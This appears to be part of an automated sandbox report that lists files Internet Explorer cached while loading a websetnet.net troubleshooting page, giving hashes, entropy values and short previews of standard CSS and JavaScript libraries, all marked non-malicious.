                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\86B850Z5\style[1].css
                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):26884
                                                                                              Entropy (8bit):4.971968867337541
                                                                                              Encrypted:false
                                                                                              SSDEEP:384:WVjalsCOEhSJqSi1Ztk3Xk6hLekn8dZt+ek4hhQae:WVqsXJqHZtybF0Y
                                                                                              MD5:94290803DEA184AF2EB5278C505C1E22
                                                                                              SHA1:E2B740D44340275CE134CF36ED0F63F9792C4F71
                                                                                              SHA-256:3FD836FE8E69562AC6BC65764C80E19DBE4065AFCA5BE052B023B466FE98B371
                                                                                              SHA-512:E58D041069522FBC9F21C33E2894B7DC64F8B575360F0E6666D1E994F057ADFF88D714B1D1FD45DE228F121DF0960266DD1C78863337024F14445FB1F9599B26
                                                                                              Malicious:false
                                                                                              Preview: html{line-height:1.15;-webkit-text-size-adjust:100%}body{margin:0}main{display:block}h1{font-size:2em;margin:.67em 0}hr{box-sizing:content-box;height:0;overflow:visible}pre{font-family:monospace,monospace;font-size:1em}a{background-color:initial}abbr[title]{border-bottom:none;text-decoration:underline;-webkit-text-decoration:underline dotted;text-decoration:underline dotted}b,strong{font-weight:bolder}code,kbd,samp{font-family:monospace,monospace;font-size:1em}small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}sub{bottom:-.25em}sup{top:-.5em}img{border-style:none}button,input,optgroup,select,textarea{font-family:inherit;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}button,select{text-transform:none}[type=button],[type=reset],[type=submit],button{-webkit-appearance:button}[type=button]::-moz-focus-inner,[type=reset]::-moz-focus-inner,[type=submit]::-moz-focus-inner,button::-moz-focus-inner{border-style:none;padding:
                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\86B850Z5\wpp[1].css
                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):388
                                                                                              Entropy (8bit):4.664497266258935
                                                                                              Encrypted:false
                                                                                              SSDEEP:6:TNnvPEsitqiJwDAtuelNXKJYa4N066Csideu+Z7VNCevPBG:TNnvP6pmAtuelNAYa4N96CveHZJN4
                                                                                              MD5:0CB7DA754D98A4349AC9FB8FB9A71926
                                                                                              SHA1:044DA01BAEFACC7A0EC1201C3E3CD5FBD53980E3
                                                                                              SHA-256:FF166B12604C3E60D5617F02006E0FC6FACE471B74A5B097A4F59AD67ED8530A
                                                                                              SHA-512:34ECB9BCFB634148BA4BE9B42D8A4A60D2C13AB5E3A3DCA07E36F751D6213642144CD0EE6827FEC4BF150C9FDFB47BA8D8E37BCD275D89DB1BE5A154511A8EBF
                                                                                              Malicious:false
                                                                                              Preview: .wpp-no-data{}.wpp-list{}.wpp-list li{overflow:hidden;float:none;clear:both;margin-bottom:1rem}.wpp-list li:last-of-type{margin-bottom:0}.wpp-list li.current{}.wpp-thumbnail{display:inline;float:left;margin:0 1rem 0 0;border:0}.wpp-post-title{}.wpp-excerpt{}.wpp-meta,.post-stats{display:block;font-size:.8em}.wpp-comments{}.wpp-views{}.wpp-author{}.wpp-date{}.wpp-category{}.wpp-rating{}
                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\KD8PQN1H\fix-there-was-an-error-opening-this-document[1].htm
                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                              File Type:HTML document, UTF-8 Unicode text, with very long lines
                                                                                              Category:dropped
                                                                                              Size (bytes):119617
                                                                                              Entropy (8bit):5.387563638107859
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:fqCONxSDN8cxjPZdszZ0Imwq8OTdCzvydJKUuZJGEfyxQx6mG3:wxSD/7HbYLPU16o
                                                                                              MD5:F8E328A07E339CFDB9A81D602DC789F7
                                                                                              SHA1:E67922C1916FAF7868227ACDD15DE5499DA743E4
                                                                                              SHA-256:62033129C887139F86C05F2338A52BEF01004E2D2B801BFEC433F8CF0BFAEC7D
                                                                                              SHA-512:CBB1B75532CDACCC511339D27084472F2DAC6026D9B7C758E7C42AE9D4C0F7B7FF561BA1EA29FC4BE7FB31BDB63EF336CC39892A4DB3F44E6FA65BD6130BFB2A
                                                                                              Malicious:false
                                                                                              Preview: <!DOCTYPE html><html lang="pt" class="no-deferjs"><head>.<meta charset="utf-8">.<meta name="viewport" content="width=device-width, initial-scale=1">.<meta http-equiv="X-UA-Compatible" content="IE=edge">.<link rel="dns-prefetch" href="https://fonts.googleapis.com/">.<link rel="preconnect" href="https://cdn.statically.io/">.<link rel="preload" as="script" href="https://cdn.statically.io/wp/c/5.8.2/wp-includes/js/jquery/jquery.min.js">.<link rel="preload" as="script" href="https://cdn.statically.io/wp/c/5.8.2/wp-includes/js/jquery/jquery-migrate.min.js">.<link rel="preload" as="script" href="https://cdn.statically.io/js/websetnet.net/wp-content/plugins/cfmonitor/js/check_min.js">.<link rel="preload" as="script" href="https://cdn.statically.io/js/websetnet.net/wp-content/plugins/wordpress-popular-posts/assets/js/wpp.min.js">.<link rel="preconnect" href="https://pagead2.googlesyndication.com/" crossorigin="anonymous">.<link rel="preload" as="script" href="https://cdn.statically.io/wp/c/5.8.
                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\KD8PQN1H\watch[1].js
                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                              File Type:UTF-8 Unicode (with BOM) text, with very long lines
                                                                                              Category:dropped
                                                                                              Size (bytes):136754
                                                                                              Entropy (8bit):5.5748881013792335
                                                                                              Encrypted:false
                                                                                              SSDEEP:3072:UnkuZawvJFnJ8Bzo+4MwtIcjiP5xJ1wrZ:aIWJKMucjAJ1wrZ
                                                                                              MD5:B7061DCBFA214040921C36D7C6BC9011
                                                                                              SHA1:D4B179531E84AAD51EE340EEDEF15EDED6C910E1
                                                                                              SHA-256:AF5DB2B67F7139B86B9B0C931EB53842474D2B950C3830457D30CAF1CC6DED28
                                                                                              SHA-512:36DD3A6FA2803929A0F7111997D2AAC1C102C0F3B31C87A9FE7933AC305E3607BFAFD40430EFB3C21CF911AF9635407C7D354633F443D54992FA04FE40E725D7
                                                                                              Malicious:false
                                                                                              Preview: .(function(){try{(function(Oc){function Si(a){return a.replace(Ti,function(c,b,d,e){return""+b+e})}function Pc(a,c){if(!c)return!1;var b=N(a);return(new RegExp(c)).test(""+b.pathname+b.hash+b.search)}function Ui(a,c){return Ea(a,c,function(b){var d=n(b,"settings.dr");return{wc:Vi(a,d),isEnabled:n(b,"settings.auto_goals")}})}function Wi(a,c){function b(){var m=l+"0",p=l+"1";h[m]?h[p]?(l=l.slice(0,-1),--k):(g[p]=e(8),h[p]=1):(g[m]=e(8),h[m]=1)}function d(){var m=l+"1";h[l+"0"]?h[m]?(l=l.slice(0,-1),--k):(l+="1",.h[l]=1):(l+="0",h[l]=1)}function e(m){void 0===m&&(m=1);var p=f.slice(k,k+m);k+=m;return p}for(var f=hf(a,c,""),g={},h={},k=1,l="";k<f.length-1;)("0"===e()?d:b)();return g}function Xi(a,c,b,d,e){b=Od(a,a.document.body,b);d=Od(a,a.document.body,d);K(e.target,[b,d])&&Pd(a,c)}function jf(a,c,b,d){(b=Yi(a,d,b))&&Pd(a,c,b)}function kf(a,c){var b=lf(a,c);return Zi(a,b)}function lf(a,c){var b=Od(a,a.document.body,c);return b?$i(a,b):""}function Pd(a,c,b){(c=za(a,c))&&c.params(dc(["__y
                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\OHV7M0FR\3DvoVCc[1].htm
                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                              File Type:HTML document, ASCII text
                                                                                              Category:dropped
                                                                                              Size (bytes):175
                                                                                              Entropy (8bit):4.6654143471376885
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:qVvzLURODccZ/vXbvx9nDyO2yAR/ARK7YP+P4KVXMPApRyCWqbIKAFSXbKFvNGb:qFzLIeco3XLx92LFAssPmVIAp3WqbI5O
                                                                                              MD5:C157BE7F7AA5B259FF6500429433119E
                                                                                              SHA1:0B001F1DC5459A1E94EB881B29A82804A6AF2774
                                                                                              SHA-256:DBDCDD753E13697DE328424B02C3D028557B137B85213A1BA6DD0602B9BB4409
                                                                                              SHA-512:F089EDE6232ED1B90311FB06DBB809ED9582CDC6CA05FE5DA7C88C0D2F7C037BED527C7EBE905452602C28D57178089C3B4114DE2BD53BC904474EBAD4F58265
                                                                                              Malicious:false
                                                                                              Preview: <html>.<head><title>Bitly</title></head>.<body><a href="https://websetnet.net/pt/fix-there-was-an-error-opening-this-document/?utm_source=google">moved here</a></body>.</html>
                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\OHV7M0FR\check_min[1].js
                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):12628
                                                                                              Entropy (8bit):5.361166059577346
                                                                                              Encrypted:false
                                                                                              SSDEEP:384:asdaxJQ1roXli310lgJd8BGCXUf4cPmEGf1ln5Eosntn/4BC78dw:ddqJQWXli310lgJdDCX9YmEGtJe/EuAw
                                                                                              MD5:BFA02F56DBC1FD9A8892B6BD9CAECDE9
                                                                                              SHA1:7CAA93C332A5EB1317A655D1D9BB16925018D0E2
                                                                                              SHA-256:BFD81D767CF94F0CB3F078A30A8136BA6FBA011E0568EE9F8F0BA2A1785E037C
                                                                                              SHA-512:16F2E15B200B53CF5A71EDE6B94DAF002FC3EFBA97CE6BFD75A4C466119B43A83E80EF8764C001999B82FB3D11456318011EB63494A3D0A5FBD45FDA5E355506
                                                                                              Malicious:false
                                                                                              Preview: jQuery(document).ready(function(e){var o,t,n=cfmonitor.is_blocked,i=cfmonitor.nonce,s=cfmonitor.ajaxurl,l=cfmonitor.currentURL,a=cfmonitor.debug,c=null!=cfmonitor.customclass&&""!==cfmonitor.customclass?cfmonitor.customclass:"cfmonitor",r=null!=cfmonitor.customclass&&""!==cfmonitor.customclass?Array("."+cfmonitor.customclass,".adsbygoogle"):Array(" ",".adsbygoogle"),d=cfmonitor.disablead,u=jQuery;u.cfmonitor={cfmonitor_options:{maxClicks:2,countDown:5,defaultElements:r,dataMethod:"GET",checkDataUrl:!1,clickDataUrl:!1,blockOnError:!0,blockTitle:"Critical Error",thanksTitle:!1,thanksMsg:!1,thanksTimer:3},elements:[],iframes:["aswift_0","aswift_1","aswift_3","aswift_4","aswift_5","aswift_6","aswift_7","aswift_8","aswift_9"]};var f,m=u.extend(u.cfmonitor.cfmonitor_options,m),p=!1;function h(){u(document).ajaxStop(jQuery.unblockUI),jQuery.blockUI(),g()}function b(e){"true"===a&&console.log(e)}function k(){u("ins.adsbygoogle").length&&u("ins.adsbygoogle").hide(),u(".adsbygoogle").length&&u("
                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\OHV7M0FR\f3h.min[1].js
                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                              File Type:ASCII text, with very long lines
                                                                                              Category:dropped
                                                                                              Size (bytes):7812
                                                                                              Entropy (8bit):5.289585143879896
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:GPTY+Rq0ouqV9tDE27I3zMLzB+NUUCaiUMUeJSxbCB:CTYR0GV95pc3zMfBACaiUMUeJyb4
                                                                                              MD5:6057FEB252B692A98DAD77271B0CAC49
                                                                                              SHA1:B4CE8939DD446E311D985D01D4C30B81778F0A33
                                                                                              SHA-256:08D76847BF78C620E7823F1EB92C1B7689EA5087CBFA4F8DF8C49981F5839A71
                                                                                              SHA-512:326432DB092369007F5474B7E3235FAFF482829E5C0B049E2C214D593024F3C0ED0113A1C91132235C939B52C869DAC8FDC2DD413FBA94DF610BB682B84A44BC
                                                                                              Malicious:false
                                                                                              Preview: /*!. * ==============================================================. * F3H 1.0.12. * ==============================================================. * Author: Taufik Nurrohman <https://github.com/taufik-nurrohman>. * License: MIT. * --------------------------------------------------------------. */.!function(e,t,n){var r,o,u,i="GET",s="POST",c="document",f="text",a="replace",l="search",p="test",h=e.history,d=e.location,v="//"+d.hostname,m=t.documentElement,g=t.currentScript;function y(e,t){return e.getAttribute(t)}function b(e,t){return e.hasAttribute(t)}function L(e,t,n){return e.setAttribute(t,n)}function k(e){return e.innerHTML}function w(e){return"false"!==e&&(""===e||"null"===e?null:"true"===e||(/^-?(\d*\.)?\d+$/[p](e)?+e:e))}function S(e){return H(e)?"submit":"click"}function E(e,t,n){e.removeEventListener(t,n)}function T(e,t,n){e.addEventListener(t,n,!1)}function C(e){return e.split("#")[1]||""}function j(e){return e.split("#")[0]}function x(e){var t,n=0,r=e.length;if(0===r)r
                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\OHV7M0FR\f[1].txt
                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                              File Type:ASCII text, with very long lines
                                                                                              Category:dropped
                                                                                              Size (bytes):148821
                                                                                              Entropy (8bit):5.580809849822616
                                                                                              Encrypted:false
                                                                                              SSDEEP:3072:d0rseIbXIPmT8iX8BRQ1UaEsd7lBRnDKu5Xk8F9IpoGIpAEjIpAJkIpA3oIfPXIu:v9bXGiXmmeaEM7lBRnDKu5Xk8F9IpoG1
                                                                                              MD5:858F30F5342E00AD4EF81233183693A1
                                                                                              SHA1:FC2DEABCC538900284EE378665760E20DEAD1AF3
                                                                                              SHA-256:4F0B3C78241C18AA920A37A5AE6EEC80E42A254F20FBC9820C2678D6F4FF47AC
                                                                                              SHA-512:4FD3BB15FCA11C40FA7FA79E45206ACC57D89C86A41A3A5B7465394EDDD0DF56D1A5055B53D3BADDF26CF3C2C4974232A6072C44987BD15BA4CFCE01483D5CB9
                                                                                              Malicious:false
                                                                                              Preview: (function(sttc){/* . . Copyright The Closure Library Authors. . SPDX-License-Identifier: Apache-2.0 .*/ .var aa,ba;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a}; .function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var fa=ea(this),ha="function"===typeof Symbol&&"symbol"===typeof Symbol("x"),n={},ia={};function p(a,b){var c=ia[b];if(null==c)return a[b];c=a[c];return void 0!==c?c:a[b]} .function ja(a,b,c){if(b)a:{var d=a.split(".");a=1===d.length;var e=d[0],f;!a&&e in n?f=n:f=fa;for(e=0;e<d.length-1;e++){var g=d[e];if(!(g in f))break a;f=f[g]}d=d[d.length-1];c=ha&&"es6"===c?f
                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\OHV7M0FR\f[2].txt
                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                              File Type:ASCII text, with very long lines
                                                                                              Category:dropped
                                                                                              Size (bytes):148786
                                                                                              Entropy (8bit):5.580500079036087
                                                                                              Encrypted:false
                                                                                              SSDEEP:3072:d0rseIbXIPmT8iX8BRQ1UaEsd7lBRnDKu5Xk8F9IpoGIpAEjIpAJkIpA3oIfPXIR:v9bXGiXmmeaEM7lBRnDKu5Xk8F9IpoGE
                                                                                              MD5:738B33AA4CDBF35CB6EE7B040CC51C05
                                                                                              SHA1:9DEEC552B422C0DE590E81A09ED92E6A4B7AE36A
                                                                                              SHA-256:956D5D0F606FF744FC3A8097C3C744CACA24B8DF706068BC1CEAE636496FE8E0
                                                                                              SHA-512:01C083946CFFC8332602147A520ECFED1B16DE7518BF85605C5332E920852A6A98DDCC3E9521F7660D7B910EDF018695C04786EB90DDD535A0DFA7092E673B98
                                                                                              Malicious:false
                                                                                              Preview: (function(sttc){/* . . Copyright The Closure Library Authors. . SPDX-License-Identifier: Apache-2.0 .*/ .var aa,ba;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a}; .function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var fa=ea(this),ha="function"===typeof Symbol&&"symbol"===typeof Symbol("x"),n={},ia={};function p(a,b){var c=ia[b];if(null==c)return a[b];c=a[c];return void 0!==c?c:a[b]} .function ja(a,b,c){if(b)a:{var d=a.split(".");a=1===d.length;var e=d[0],f;!a&&e in n?f=n:f=fa;for(e=0;e<d.length-1;e++){var g=d[e];if(!(g in f))break a;f=f[g]}d=d[d.length-1];c=ha&&"es6"===c?f
                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\OHV7M0FR\f[3].txt
                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                              File Type:ASCII text, with very long lines
                                                                                              Category:dropped
                                                                                              Size (bytes):148786
                                                                                              Entropy (8bit):5.580476818711306
                                                                                              Encrypted:false
                                                                                              SSDEEP:3072:d0rseIbXIPmT8iX8BRQ1UaEsd7lBRnDKu5Xk8F9IpoGIpAEjIpAJkIpA3oIfPXIE:v9bXGiXmmeaEM7lBRnDKu5Xk8F9IpoGt
                                                                                              MD5:734DDE81B4330DB5489CE526525098E7
                                                                                              SHA1:B6DFCECEB8AAFD5E974765B55E869EC5DA923449
                                                                                              SHA-256:CC6CACB2BF81C1FD222E9F3B1CB4BDB4CD76A52870E290706C6AE78F6DABF70A
                                                                                              SHA-512:A73E9CF06AF4DFA23E28E3F14272AF3AC5486A8A0D51BAA784609181581A4C3BCE1D2AC9107E513DC90FB7B4E9CB5E28EB4BAFFED196205FDFB70D54F7A15937
                                                                                              Malicious:false
                                                                                              Preview: (function(sttc){/* . . Copyright The Closure Library Authors. . SPDX-License-Identifier: Apache-2.0 .*/ .var aa,ba;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a}; .function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var fa=ea(this),ha="function"===typeof Symbol&&"symbol"===typeof Symbol("x"),n={},ia={};function p(a,b){var c=ia[b];if(null==c)return a[b];c=a[c];return void 0!==c?c:a[b]} .function ja(a,b,c){if(b)a:{var d=a.split(".");a=1===d.length;var e=d[0],f;!a&&e in n?f=n:f=fa;for(e=0;e<d.length-1;e++){var g=d[e];if(!(g in f))break a;f=f[g]}d=d[d.length-1];c=ha&&"es6"===c?f
                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\OHV7M0FR\f[4].txt
                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                              File Type:ASCII text, with very long lines
                                                                                              Category:dropped
                                                                                              Size (bytes):148786
                                                                                              Entropy (8bit):5.5804912048175614
                                                                                              Encrypted:false
                                                                                              SSDEEP:3072:d0rseIbXIPmT8iX8BRQ1UaEsd7lBRnDKu5Xk8F9IpoGIpAEjIpAJkIpA3oIfPXI3:v9bXGiXmmeaEM7lBRnDKu5Xk8F9IpoGm
                                                                                              MD5:9897E8802BF993F6389186E0F39A35D7
                                                                                              SHA1:39FC6ABF7111CBB99DABEA0C96F7E39DCFCF2F27
                                                                                              SHA-256:C0042BBD7746CFD2CCA0CDFE4639847C0659545825E1E8ABA6CE8330AD186A3E
                                                                                              SHA-512:4E9659EB70BCDB1F5991DB5C5E14834A046BD94F252FAB076B884524648AAD980A62EC32D27A92B1142EAA5EFC7CEFC0EDE1370C55852CDCBFE765880E0723A8
                                                                                              Malicious:false
                                                                                              Preview: (function(sttc){/* . . Copyright The Closure Library Authors. . SPDX-License-Identifier: Apache-2.0 .*/ .var aa,ba;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a}; .function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var fa=ea(this),ha="function"===typeof Symbol&&"symbol"===typeof Symbol("x"),n={},ia={};function p(a,b){var c=ia[b];if(null==c)return a[b];c=a[c];return void 0!==c?c:a[b]} .function ja(a,b,c){if(b)a:{var d=a.split(".");a=1===d.length;var e=d[0],f;!a&&e in n?f=n:f=fa;for(e=0;e<d.length-1;e++){var g=d[e];if(!(g in f))break a;f=f[g]}d=d[d.length-1];c=ha&&"es6"===c?f
                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\OHV7M0FR\hoverIntent.min[1].js
                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                              File Type:ASCII text, with very long lines
                                                                                              Category:dropped
                                                                                              Size (bytes):1480
                                                                                              Entropy (8bit):4.991568437187243
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:Q77GSHLWBBB7cNu2RxxMUtz2PX9pKKuhFCMJYKTy4DH3ngAtKn6CtOrfX+DKXQhn:Q7CSHLWrxcNu2RLz2PNAKAMQe4DXgA3M
                                                                                              MD5:D32284BF549010B8CA0610D2A8F9627E
                                                                                              SHA1:845152FCC5836C80BC277EF6D58B26E2038BF92A
                                                                                              SHA-256:CD1CC14B59F5918E11725643EF36381B85CF569C6626FB4FDBE39C2EBA9BDFE8
                                                                                              SHA-512:4E1564BECF7D6DC4B805871E5B577B3BD41263339033338DE90F6C40D5B105D4394D678B8B9735C1A4D14736BCEC99C9A8836FB3384CEEEFD968F7954A568ED5
                                                                                              Malicious:false
                                                                                              Preview: /*! This file is auto-generated */.!function(e){"use strict";"function"==typeof define&&define.amd?define(["jquery"],e):"object"==typeof module&&module.exports?module.exports=e(require("jquery")):jQuery&&!jQuery.fn.hoverIntent&&e(jQuery)}(function(i){"use strict";function d(e){u=e.pageX,r=e.pageY}var u,r,v={interval:100,sensitivity:6,timeout:0},a=0,p=function(e,t,n,o){if(Math.sqrt((n.pX-u)*(n.pX-u)+(n.pY-r)*(n.pY-r))<o.sensitivity)return t.off(n.event,d),delete n.timeoutId,n.isActive=!0,e.pageX=u,e.pageY=r,delete n.pX,delete n.pY,o.over.apply(t[0],[e]);n.pX=u,n.pY=r,n.timeoutId=setTimeout(function(){p(e,t,n,o)},o.interval)};i.fn.hoverIntent=function(e,t,n){var o=a++,s=i.extend({},v);i.isPlainObject(e)?(s=i.extend(s,e),i.isFunction(s.out)||(s.out=s.over)):s=i.isFunction(t)?i.extend(s,{over:e,out:t,selector:n}):i.extend(s,{over:e,out:e,selector:t});t=function(e){var u=i.extend({},e),r=i(this),t=r.data("hoverIntent");t||r.data("hoverIntent",t={});var v=t[o];v||(t[o]=v={id:o}),v.timeoutId&
                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\OHV7M0FR\jquery-migrate.min[1].js
                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                              File Type:ASCII text, with very long lines
                                                                                              Category:dropped
                                                                                              Size (bytes):11224
                                                                                              Entropy (8bit):5.2603128465032745
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:JrprDNvD66fPP/+I6OP1fQP0OIr96DB6MHXcwr1RF:JrprxG6fPP3P1fQMOIsDsMMS
                                                                                              MD5:79B4956B7EC478EC10244B5E2D33AC7D
                                                                                              SHA1:A46025B9D05E3DF30D610A8AEF14F392C7058DC9
                                                                                              SHA-256:029E0A2E809FD6B5DBE76ABE8B7A74936BE306C9A8C27C814C4D44AA54623300
                                                                                              SHA-512:217F86FEE871FA36ECA4F25830E3917C7BF57A681140B135C508AA32F2A1E3EFF5A80661F3B5BA46747D0C305AF10B658D207F449550F3D417D9683216FEEA8F
                                                                                              Malicious:false
                                                                                              Preview: /*! jQuery Migrate v3.3.2 | (c) OpenJS Foundation and other contributors | jquery.org/license */."undefined"==typeof jQuery.migrateMute&&(jQuery.migrateMute=!0),function(t){"use strict";"function"==typeof define&&define.amd?define(["jquery"],function(e){return t(e,window)}):"object"==typeof module&&module.exports?module.exports=t(require("jquery"),window):t(jQuery,window)}(function(s,n){"use strict";function e(e){return 0<=function(e,t){for(var r=/^(\d+)\.(\d+)\.(\d+)/,n=r.exec(e)||[],o=r.exec(t)||[],i=1;i<=3;i++){if(+o[i]<+n[i])return 1;if(+n[i]<+o[i])return-1}return 0}(s.fn.jquery,e)}s.migrateVersion="3.3.2",n.console&&n.console.log&&(s&&e("3.0.0")||n.console.log("JQMIGRATE: jQuery 3.0.0+ REQUIRED"),s.migrateWarnings&&n.console.log("JQMIGRATE: Migrate plugin loaded multiple times"),n.console.log("JQMIGRATE: Migrate is installed"+(s.migrateMute?"":" with logging active")+", version "+s.migrateVersion));var r={};function u(e){var t=n.console;s.migrateDeduplicateWarnings&&r[e]||(r[e]=!0
                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\OHV7M0FR\jquery.min[1].js
                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                              File Type:ASCII text, with very long lines
                                                                                              Category:dropped
                                                                                              Size (bytes):89521
                                                                                              Entropy (8bit):5.289973268315515
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1vM:DIh8GgP3hujzwbhd3XvSiDQ47GKq
                                                                                              MD5:02DD5D04ADD4759122013C5AB4DC5CC2
                                                                                              SHA1:A45A56E396AC549B4FF39B696CE9E0C16A7612DE
                                                                                              SHA-256:BD4DE6A3FC0FB68D6F76BA7B93514B96A92E585C295B5351C31AD92A4B0777EA
                                                                                              SHA-512:04690D9875E98F5AE6BF94F5C71B7A0177B374BC09609A0F58312E1C337348749A40E07FE226737DC248BD8FE2F6A489071258619AFFC7F1DF644E4255159615
                                                                                              Malicious:false
                                                                                              Preview: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\OHV7M0FR\pagebooster[1].js
                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                              File Type:ASCII text, with very long lines
                                                                                              Category:dropped
                                                                                              Size (bytes):2107
                                                                                              Entropy (8bit):5.069651289316047
                                                                                              Encrypted:false
                                                                                              SSDEEP:48:wusoleZs3wtfG4dwtfk0U6Y++Miw9hwXUwmC4wsxjsvn4x1rafSfot/sodfY:wag9xqxk0Hd927michIntdfY
                                                                                              MD5:B9E152AD8E45F64563A51258468A527A
                                                                                              SHA1:A97D25A9C43C344978CD4C7A3345999B9E7431F3
                                                                                              SHA-256:B5ABBC93D709AAA8506017E4B5CA786BF323AD2A1DD2205E78BF122CCB22D6AC
                                                                                              SHA-512:B343611F951747D927287441FF87003EDA0357AABA5161CCD4F4DA2C4FB0C06197BC8051873E68178F82C52A72DDBABA223A349D83DFDA39FD8E639575EC6A3F
                                                                                              Malicious:false
